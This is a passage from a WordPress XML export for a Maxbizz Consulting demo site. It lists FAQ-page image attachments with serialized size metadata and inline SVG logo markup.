		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:250;s:4:"file";s:19:"2020/09/bg1-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:18:"bg1-faq-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"bg1-faq-1024x133.jpg";s:5:"width";i:1024;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"bg1-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"bg1-faq-768x100.jpg";s:5:"width";i:768;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:20:"bg1-faq-1536x200.jpg";s:5:"width";i:1536;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"bg1-faq-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"bg1-faq-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:20:"bg1-faq-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:20:"bg1-faq-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/bg2-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:46:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>574</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:46:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:46:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:681;s:4:"file";s:19:"2020/09/bg2-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:19:"bg2-faq-300x106.jpg";s:5:"width";i:300;s:6:"height";i:106;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"bg2-faq-1024x363.jpg";s:5:"width";i:1024;s:6:"height";i:363;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"bg2-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"bg2-faq-768x272.jpg";s:5:"width";i:768;s:6:"height";i:272;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:20:"bg2-faq-1536x545.jpg";s:5:"width";i:1536;s:6:"height";i:545;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"bg2-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"bg2-faq-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:20:"bg2-faq-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:20:"bg2-faq-1200x681.jpg";s:5:"width";i:1200;s:6:"height";i:681;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/01-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>583</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/02-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>584</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/03-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>585</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
